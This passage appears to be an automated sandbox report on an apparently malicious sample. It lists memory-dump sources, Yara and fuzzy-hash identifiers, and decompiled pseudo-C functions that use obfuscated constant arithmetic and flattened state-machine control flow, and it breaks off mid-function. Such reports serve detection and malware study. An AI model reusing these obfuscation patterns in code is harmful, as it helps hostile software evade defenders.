0x00243466
0x0024346e
0x00243476
0x0024347b
0x0024348a
0x0024348b
0x0024348f
0x00243497
0x002434a4
0x002434a8
0x002434b0
0x002434b8
0x002434c0
0x002434c8
0x002434d0
0x002434d8
0x002434e0
0x002434e8
0x002434f0
0x00243503
0x00243507
0x0024350c
0x00243514
0x0024351c
0x00243524
0x00243529
0x00243531
0x00243539
0x00243541
0x00243549
0x00243551
0x00243559
0x0024355e
0x00243566
0x0024356e
0x0024356e
0x00243578
0x00243600
0x00243602
0x0024357a
0x00243580
0x002435a2
0x002435a7
0x002435aa
0x00000000
0x00243582
0x00243588
0x00000000
0x0024358a
0x0024358a
0x00000000
0x0024358a
0x00243588
0x00243580
0x00243606
0x0024360e
0x0024360e
0x002435c6
0x002435cb
0x002435ce
0x002435d0
0x002435d6
0x00000000
0x002435d2
0x002435d2
0x00000000
0x002435d2
0x00000000
0x002435db
0x002435db
0x002435db
0x00000000

Strings

@d, xrefs: 00243549

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @d
API String ID: 0-4219467963
Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction ID: fb192e6da7435b10cd57d96b92fc4e8eabbe567b4dfe92bbea5047ee3f4add88
Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
Instruction Fuzzy Hash: E35177B11083429BD318CF21C84A81FFBF1BBD8748F504A1DF59A92160D7B5CA198F87

Uniqueness

Uniqueness Score: -1.00%

Function 00243FE7, Relevance: 1.4, Strings: 1, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00243FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t80;
				signed int _t94;
				signed int _t95;
				void* _t98;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;

				_push(_a8);
				_t114 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t80);
				_v96 = 0xd1bf;
				_t118 = _t117 + 0x10;
				_t115 = 0;
				_t98 = 0x349149b3;
				_t94 = 0x64;
				_v96 = _v96 / _t94;
				_v96 = _v96 ^ 0x00007874;
				_v104 = 0x2a01;
				_v104 = _v104 + 0x4d1a;
				_v104 = _v104 + 0xb0bd;
				_v104 = _v104 ^ 0x00017b91;
				_v108 = 0x44db;
				_v108 = _v108 + 0xffff0b38;
				_t95 = 0x1c;
				_v108 = _v108 * 7;
				_v108 = _v108 ^ 0xfffb0952;
				_v112 = 0x5707;
				_v112 = _v112 + 0x69dd;
				_v112 = _v112 + 0xef17;
				_v112 = _v112 | 0x7086095e;
				_v112 = _v112 ^ 0x7087ed58;
				_v92 = 0x8129;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x00001eae;
				_v80 = 0x8f03;
				_v80 = _v80 ^ 0x5fd75a11;
				_v80 = _v80 ^ 0x5fd7f025;
				_v84 = 0x94fc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x00001c7c;
				_v100 = 0xd584;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 / _t95;
				_v100 = _v100 ^ 0x00001ad3;
				_v88 = 0x35b5;
				_v88 = _v88 * 0x43;
				_v88 = _v88 ^ 0x000e607f;
				do {
					while(_t98 != 0x2d9dd110) {
						if(_t98 == 0x2e4dc862) {
							__eflags = E00248F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
							_t115 =  !=  ? 1 : _t115;
						} else {
							if(_t98 == 0x32f61d6a) {
								E002450F2( &_v76, _v96, _v104, _v108, _a8);
								_t118 = _t118 + 0xc;
								_t98 = 0x2d9dd110;
								continue;
							} else {
								if(_t98 != 0x349149b3) {
									goto L10;
								} else {
									_t98 = 0x32f61d6a;
									continue;
								}
							}
						}
						L13:
						return _t115;
					}
					__eflags = E0023B055(_v112, _v92, __eflags,  &_v76, _t114);
					if(__eflags == 0) {
						_t98 = 0x5080212;
						goto L10;
					} else {
						_t98 = 0x2e4dc862;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t98 - 0x5080212;
				} while (__eflags != 0);
				goto L13;
			}

0x00243fee
0x00243ff5
0x00243ff7
0x00243ffe
0x00243fff
0x00244000
0x00244005
0x0024400d
0x00244016
0x00244018
0x00244024
0x00244029
0x0024402f
0x00244037
0x0024403f
0x00244047
0x0024404f
0x00244057
0x0024405f
0x0024406c
0x0024406d
0x00244071
0x00244079
0x00244081
0x00244089
0x00244091
0x00244099
0x002440a1
0x002440a9
0x002440ae
0x002440b6
0x002440be
0x002440c6
0x002440ce
0x002440d6
0x002440db
0x002440e3
0x002440eb
0x002440fb
0x002440ff
0x00244107
0x00244114
0x00244118
0x00244120
0x00244120
0x0024412a
0x002441b1
0x002441b3
0x0024412c
0x0024412e
0x00244153
0x00244158
0x0024415b
0x00000000
0x00244130
0x00244136
0x00000000
0x00244138
0x00244138
0x00000000
0x00244138
0x00244136
0x0024412e
0x002441b7
0x002441bf
0x002441bf
0x00244177
0x00244179
0x0024417f
0x00000000
0x0024417b
0x0024417b
0x00000000
0x0024417b
0x00000000
0x00244184
0x00244184
0x00244184
0x00000000

Strings

tx, xrefs: 0024402F

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: tx
API String ID: 0-1414813443
Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction ID: a9d56f873395b612d6965ed42aed0979fa16b0c30ee6dc236b153e4e311f243a
Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
Instruction Fuzzy Hash: 6441A9715083429BE718DE20C88592FBBE1FBD8708F104A1DF5C9A62A0D7B5CA19CF83

Uniqueness

Uniqueness Score: -1.00%

Function 002360B9, Relevance: 1.4, Strings: 1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E002360B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				void* _t104;
				void* _t109;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t128;

				_push(_a20);
				_t109 = __ecx;
				_t111 = _a16;
				_push(_a16);
				_push(_a12);
				_v44 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(0x104);
				_v8 = 0xaf29;
				_v8 = _v8 >> 0xe;
				_t128 = 0;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0000662d;
				_v20 = 0xac55;
				_v20 = _v20 | 0x2323cee5;
				_t124 = 0x4c;
				_v20 = _v20 / _t124;
				_v20 = _v20 ^ 0x007629b6;
				_v16 = 0xabf2;
				_v16 = _v16 | 0x220f7c85;
				_v16 = _v16 + 0xffff7509;
				_v16 = _v16 ^ 0x220f51b4;
				_v40 = 0x3232;
				_t125 = 0x1f;
				_v40 = _v40 / _t125;
				_v40 = _v40 ^ 0x00004228;
				_v36 = 0x2ec1;
				_v36 = _v36 | 0xae4e7a63;
				_v36 = _v36 ^ 0xae4e526e;
				_v12 = 0xa12f;
				_v12 = _v12 << 0xe;
				_v12 = _v12 << 0xb;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x00007580;
				_v32 = 0xadd8;
				_v32 = _v32 | 0x6e6f3325;
				_v32 = _v32 ^ 0x5adaef9e;
				_v32 = _v32 ^ 0x34b54fa4;
				_v28 = 0xb293;
				_t126 = 0x3b;
				_v28 = _v28 * 0x2d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xfb1ed4cf;
				_v24 = 0x2b1c;
				_v24 = _v24 * 6;
				_v24 = _v24 / _t126;
				_v24 = _v24 ^ 0x00001462;
				_t104 = E00237551(_a16, _v24);
				_t127 = _t104;
				if(_t104 != 0) {
					_t128 = E00237663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
					E00244F7D(_v32, _v28, _t127);
				}
				return _t128;
			}

0x002360c2
0x002360c5
0x002360cc
0x002360cf
0x002360d0
0x002360d3
0x002360d6
0x002360d7
0x002360da
0x002360db
0x002360dc
0x002360e1
0x002360ea
0x002360ee
0x002360f0
0x002360f4
0x002360f8
0x002360ff
0x00236106
0x00236112
0x00236117
0x0023611c
0x00236123
0x0023612a
0x00236131
0x00236138
0x0023613f
0x00236149
0x0023614e
0x00236153
0x0023615a
0x00236161
0x00236168
0x0023616f
0x00236176
0x0023617a
0x0023617e
0x00236182
0x00236189
0x00236190
0x00236197
0x0023619e
0x002361a5
0x002361b0
0x002361b4
0x002361b7
0x002361bb
0x002361c2
0x002361cd
0x002361d5
0x002361d8
0x002361eb
0x002361f0
0x002361f7
0x00236211
0x00236217
0x0023621c
0x00236227

Strings

%3on, xrefs: 00236190

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: %3on
API String ID: 2962429428-3639271662
Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction ID: d035d1998c2b6168c77ef3eba76f92018f1f42e0a001c62a10c0f8faf4b32d1a
Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
Instruction Fuzzy Hash: 814106B1E0120AABDB04DFE5C98A8EEFBB5EB44704F208159E911B7250D3B89A55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0023F536, Relevance: 1.3, Strings: 1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E0023F536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t73;
				signed int _t84;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t73);
				_v28 = _v28 & 0x00000000;
				_v32 = 0x4854b3;
				_v8 = 0xdc0b;
				_t84 = 0x56;
				_v8 = _v8 * 0xf;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x0001e73e;
				_v12 = 0xfbc9;
				_v12 = _v12 + 0xb4de;
				_v12 = _v12 * 0x28;
				_v12 = _v12 ^ 0x0043d2f8;
				_v12 = 0x51f2;
				_v12 = _v12 + 0xffffcc79;
				_v12 = _v12 + 0xffffba87;
				_v12 = _v12 ^ 0xffffb404;
				_v12 = 0x6c9d;
				_v12 = _v12 / _t84;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0000581b;
				_v12 = 0x414e;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 | 0x4fdc2cbe;
				_v12 = _v12 ^ 0x4fdc7af3;
				_v12 = 0xe540;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x1b88e412;
				_v12 = _v12 ^ 0x1bebfc09;
				_v24 = 0x3d7;
				_v24 = _v24 + 0xffffb00b;
				_v24 = _v24 ^ 0xffff901a;
				_v20 = 0xd6b0;
				_v20 = _v20 ^ 0xee2b6cd1;
				_v20 = _v20 ^ 0xee2bf683;
				_v16 = 0x5822;
				_v16 = _v16 + 0xa5f;
				_v16 = _v16 ^ 0x00006b11;
				return E002408F3(_v12, _v24, _v20, _a8, _t84, E0023C506(_t84), _v16);
			}

0x0023f53c
0x0023f53f
0x0023f542
0x0023f543
0x0023f544
0x0023f549
0x0023f550
0x0023f559
0x0023f566
0x0023f567
0x0023f56a
0x0023f56e
0x0023f575
0x0023f57c
0x0023f587
0x0023f58a
0x0023f591
0x0023f598
0x0023f59f
0x0023f5a6
0x0023f5ad
0x0023f5b9
0x0023f5bc
0x0023f5bf
0x0023f5c6
0x0023f5cd
0x0023f5d1
0x0023f5d8
0x0023f5df
0x0023f5ea
0x0023f5ed
0x0023f5f4
0x0023f5fb
0x0023f602
0x0023f609
0x0023f610
0x0023f617
0x0023f61e
0x0023f625
0x0023f62c
0x0023f633
0x0023f65e

Strings

j^ , xrefs: 0023F536

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: j^
API String ID: 0-2773993462
Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction ID: a585ac990041d3756322aa3e789d57f91bedcb47b5737cae3c9d3f7d62583d15
Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
Instruction Fuzzy Hash: E931EEB4C0070AEBDF48DFA4C98A49EBFB5FB00304F608089D511BA2A0D3B94B959F80

Uniqueness

Uniqueness Score: -1.00%

Function 00245D1D, Relevance: .2, Instructions: 183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00245D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _t165;
				intOrPtr* _t183;
				void* _t185;
				void* _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;

				_t183 = _a24;
				_push(_t183);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0023602B(_t165);
				_v96 = 0x1c20a7;
				_t194 = 0;
				_v84 = _v84 & 0;
				_t199 = _t198 + 0x20;
				_v92 = 0x7c153;
				_v88 = 0xb2086;
				_t185 = 0x2476afb9;
				_v8 = 0x4175;
				_v8 = _v8 + 0xffff57ff;
				_v8 = _v8 | 0xfffbf4ff;
				_v8 = _v8 ^ 0xffffd856;
				_v56 = 0x400d;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x01004a82;
				_v52 = 0xfa4b;
				_t195 = 0x3f;
				_v52 = _v52 * 0xf;
				_v52 = _v52 ^ 0x000ed31b;
				_v48 = 0x532b;
				_v48 = _v48 | 0xa8aca4f9;
				_v48 = _v48 ^ 0xa8acfbbc;
				_v44 = 0x6cab;
				_v44 = _v44 * 0xd;
				_v44 = _v44 ^ 0x0005813c;
				_v32 = 0xa076;
				_v32 = _v32 + 0x7ba7;
				_v32 = _v32 * 0x33;
				_v32 = _v32 ^ 0x0038af53;
				_v28 = 0x80ef;
				_v28 = _v28 << 0xb;
				_v28 = _v28 | 0xbfaa7514;
				_v28 = _v28 ^ 0xbfaf1f10;
				_v24 = 0x2421;
				_v24 = _v24 / _t195;
				_t196 = 3;
				_v24 = _v24 / _t196;
				_v24 = _v24 ^ 0x000050e2;
				_v68 = 0xf6e5;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0000085c;
				_v64 = 0x7950;
				_v64 = _v64 | 0xc26498fa;
				_v64 = _v64 ^ 0xc264e84e;
				_v60 = 0xb7cc;
				_v60 = _v60 + 0xffffacef;
				_v60 = _v60 ^ 0x0000478a;
				_v40 = 0x6379;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 << 5;
				_v40 = _v40 ^ 0x00006e22;
				_v20 = 0xe665;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0xe4ef8652;
				_v20 = _v20 + 0xffffeafe;
				_v20 = _v20 ^ 0xe52339cd;
				_v80 = 0x4d1e;
				_v80 = _v80 + 0xffffc710;
				_v80 = _v80 ^ 0x000046ed;
				_v16 = 0x18c;
				_v16 = _v16 >> 4;
				_t197 = _v80;
				_v16 = _v16 * 0x41;
				_v16 = _v16 ^ 0x73128289;
				_v16 = _v16 ^ 0x7312c7aa;
				_v12 = 0xdd0b;
				_v12 = _v12 + 0xffff65de;
				_v12 = _v12 * 0x3b;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x0f6bc641;
				_v76 = 0xf5b7;
				_v76 = _v76 ^ 0xdca6f1c9;
				_v76 = _v76 ^ 0xdca64fd3;
				_v36 = 0xdf9f;
				_v36 = _v36 + 0x7ffe;
				_v36 = _v36 + 0x4fda;
				_v36 = _v36 ^ 0x00019ee0;
				_v72 = 0x5c39;
				_v72 = _v72 ^ 0x85106c7e;
				_v72 = _v72 ^ 0x85105bd4;
				do {
					while(_t185 != 0x6efb3d4) {
						if(_t185 == 0xfd0cdc7) {
							_t197 = E002496CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
							_t199 = _t199 + 0x38;
							if(_t197 == 0) {
								L15:
								return _t194;
							}
							_t185 = 0x6efb3d4;
							continue;
						}
						if(_t185 == 0x1eddc4e8) {
							E002496CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
							if(_t183 != 0) {
								 *_t183 = _t197;
							}
							goto L15;
						}
						if(_t185 != 0x2476afb9) {
							goto L11;
						}
						_t185 = 0xfd0cdc7;
					}
					_push(_t185);
					_push(_t185);
					_t194 = E00238736(_t197);
					if(_t194 == 0) {
						_t185 = 0x710c028;
						goto L11;
					}
					_t185 = 0x1eddc4e8;
					continue;
					L11:
				} while (_t185 != 0x710c028);
				goto L15;
			}

0x00245d24
0x00245d29
0x00245d2a
0x00245d2d
0x00245d30
0x00245d33
0x00245d36
0x00245d3a
0x00245d3b
0x00245d40
0x00245d47
0x00245d49
0x00245d4c
0x00245d4f
0x00245d58
0x00245d5f
0x00245d64
0x00245d6b
0x00245d72
0x00245d79
0x00245d80
0x00245d87
0x00245d8b
0x00245d92
0x00245d9f
0x00245da2
0x00245da5
0x00245dac
0x00245db3
0x00245dba
0x00245dc1
0x00245dcc
0x00245dcf
0x00245dd6
0x00245ddd
0x00245de8
0x00245deb
0x00245df2
0x00245df9
0x00245dfd
0x00245e04
0x00245e0b
0x00245e19
0x00245e1f
0x00245e22
0x00245e25
0x00245e2c
0x00245e33
0x00245e37
0x00245e3e
0x00245e45
0x00245e4c
0x00245e53
0x00245e5a
0x00245e61
0x00245e68
0x00245e6f
0x00245e73
0x00245e77
0x00245e7e
0x00245e85
0x00245e89
0x00245e90
0x00245e97
0x00245e9e
0x00245ea5
0x00245eac
0x00245eb3
0x00245eba
0x00245ec2
0x00245ec5
0x00245ec8
0x00245ecf
0x00245ed6
0x00245edd
0x00245ee8
0x00245eeb
0x00245eef
0x00245ef6
0x00245efd
0x00245f04
0x00245f0b
0x00245f12
0x00245f19
0x00245f20
0x00245f27
0x00245f2e
0x00245f35
0x00245f3c
0x00245f3c
0x00245f4a
0x00245f92
0x00245f94
0x00245f99
0x0024600b
0x00246013
0x00246013
0x00245f9b
0x00000000
0x00245f9b
0x00245f52
0x00245ffd
0x00246007
0x00246009
0x00246009
0x00000000
0x00246007
0x00245f5e
0x00000000
0x00000000
0x00245f60
0x00245f60
0x00245fab
0x00245fac
0x00245fb4
0x00245fba
0x00245fc6
0x00000000
0x00245fc6
0x00245fbc
0x00000000
0x00245fcb
0x00245fcb
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction ID: 18ce10e4a2665e5d1c9dfc412a7336867b3bd834feadff9b2ede7ef08af83e09
Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
Instruction Fuzzy Hash: F6913672C1021AABDF19CFE5D98A5EEBFB5FF04314F208109E61276260D3B94A65CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00240F0C, Relevance: .2, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00240F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t132;
				signed int _t149;
				void* _t152;
				void* _t154;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t181;

				_push(_a20);
				_t152 = __edx;
				_push(0xffffffff);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t132);
				_v44 = 0x160;
				_t181 = _t180 + 0x1c;
				_v44 = _v44 ^ 0x1b432315;
				_v44 = _v44 ^ 0x1b433d06;
				_t179 = 0;
				_v12 = 0x3352;
				_t154 = 0x2476afb9;
				_v12 = _v12 + 0xffffca9f;
				_v12 = _v12 << 1;
				_t173 = 0x29;
				_v12 = _v12 / _t173;
				_v12 = _v12 ^ 0x063e5c60;
				_v8 = 0x701a;
				_t174 = 0x52;
				_v8 = _v8 / _t174;
				_t175 = 0x4e;
				_v8 = _v8 / _t175;
				_t176 = 0x41;
				_v8 = _v8 / _t176;
				_v8 = _v8 ^ 0x0000431a;
				_v40 = 0xf48c;
				_v40 = _v40 + 0xffff0dc2;
				_v40 = _v40 ^ 0x0000090f;
				_v36 = 0x5475;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x2a3aa88b;
				_v16 = 0xfc71;
				_v16 = _v16 ^ 0x0a975394;
				_v16 = _v16 | 0x3f9daa18;
				_v16 = _v16 + 0xffff523a;
				_v16 = _v16 ^ 0x3f9f63b5;
				_v48 = 0xbfc9;
				_t177 = 0x63;
				_v48 = _v48 / _t177;
				_v48 = _v48 ^ 0x0000151a;
				_v32 = 0xfc2a;
				_v32 = _v32 | 0x12ce1451;
				_v32 = _v32 + 0x3ff4;
				_v32 = _v32 ^ 0x12cf51f6;
				_v56 = 0x5ac8;
				_v56 = _v56 | 0xf85dcbd1;
				_v56 = _v56 ^ 0xf85dd81d;
				_v52 = 0x6e3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x0006be09;
				_v28 = 0x1612;
				_v28 = _v28 ^ 0x471c56e0;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0xffff1cc1;
				_v28 = _v28 ^ 0x238d2d3e;
				_v24 = 0x515e;
				_v24 = _v24 + 0x963f;
				_v24 = _v24 + 0xffff7349;
				_t178 = _v56;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000650d8;
				_v20 = 0x1a04;
				_v20 = _v20 | 0x2258a5ab;
				_v20 = _v20 + 0xffff2fa3;
				_v20 = _v20 + 0x9894;
				_v20 = _v20 ^ 0x2258a793;
				do {
					while(_t154 != 0x6efb3d4) {
						if(_t154 == 0xfd0cdc7) {
							_t149 = E00247AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
							_t178 = _t149;
							_t181 = _t181 + 0x24;
							if(_t149 != 0) {
								_t154 = 0x6efb3d4;
								continue;
							}
						} else {
							if(_t154 == 0x1eddc4e8) {
								E00247AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
							} else {
								if(_t154 != 0x2476afb9) {
									goto L11;
								} else {
									_t154 = 0xfd0cdc7;
									continue;
								}
							}
						}
						L14:
						return _t179;
					}
					_push(_t154);
					_push(_t154);
					_t179 = E00238736(_t178 + _t178);
					if(_t179 == 0) {
						_t154 = 0x710c028;
						goto L11;
					} else {
						_t154 = 0x1eddc4e8;
						continue;
					}
					goto L14;
					L11:
				} while (_t154 != 0x710c028);
				goto L14;
			}

0x00240f15
0x00240f18
0x00240f1a
0x00240f1c
0x00240f1f
0x00240f22
0x00240f24
0x00240f25
0x00240f26
0x00240f2b
0x00240f32
0x00240f35
0x00240f3e
0x00240f45
0x00240f47
0x00240f4e
0x00240f53
0x00240f5a
0x00240f62
0x00240f67
0x00240f6c
0x00240f73
0x00240f7d
0x00240f82
0x00240f8a
0x00240f8f
0x00240f97
0x00240f9c
0x00240fa1
0x00240fa8
0x00240faf
0x00240fb6
0x00240fbd
0x00240fc4
0x00240fc8
0x00240fcf
0x00240fd6
0x00240fdd
0x00240fe4
0x00240feb
0x00240ff2
0x00240ffc
0x00240fff
0x00241002
0x00241009
0x00241010
0x00241017
0x0024101e
0x00241025
0x0024102c
0x00241033
0x0024103a
0x00241041
0x00241045
0x0024104c
0x00241053
0x0024105a
0x0024105d
0x00241064
0x0024106b
0x00241072
0x00241079
0x00241084
0x00241087
0x0024108a
0x00241091
0x00241098
0x0024109f
0x002410a6
0x002410ad
0x002410b4
0x002410b4
0x002410c2
0x002410f5
0x002410fa
0x002410fc
0x00241101
0x00241103
0x00000000
0x00241103
0x002410c4
0x002410ca
0x00241157
0x002410cc
0x002410d2
0x00000000
0x002410d4
0x002410d4
0x00000000
0x002410d4
0x002410d2
0x002410ca
0x00241160
0x00241167
0x00241167
0x00241113
0x00241114
0x0024111d
0x00241123
0x0024112c
0x00000000
0x00241125
0x00241125
0x00000000
0x00241125
0x00000000
0x00241131
0x00241131
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction ID: 12411bfc7fb724178f14c17b4ab9d9d65213884fb4f39ab9706b6e955d3f9e71
Opcode Fuzzy Hash: 54c5c56bf0af8cda16f7e28256bcac62e124157df4d0d3f995edbfb0d9cf3b88
Instruction Fuzzy Hash: EE617F72D1130AEBDF18CFE5C9859EEBBB2FF44314F248219E612B6290D3B54A518F90

Uniqueness

Uniqueness Score: -1.00%

Function 0023F444, Relevance: .1, Instructions: 128
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0023F444(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t120;
				signed int _t126;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				intOrPtr* _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				void* _t159;
				void* _t160;

				_t128 = __ecx;
				_t152 =  *0x24ca24; // 0x0
				while(_t152 != 0) {
					if( *((intOrPtr*)(_t152 + 0x28)) != 0) {
						 *((intOrPtr*)(_t152 + 4))( *((intOrPtr*)(_t152 + 0x28)), 0xb, 0);
					}
					_t152 =  *((intOrPtr*)(_t152 + 0x2c));
				}
				_t129 = _t128 | 0xffffffff;
				_pop(_t153);
				_t160 = _t159 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_t126 = _t129;
				_t149 = 0x24ca24;
				_t130 = 0x77;
				_v8 = _v8 / _t130;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_t131 = 0x67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / _t131;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
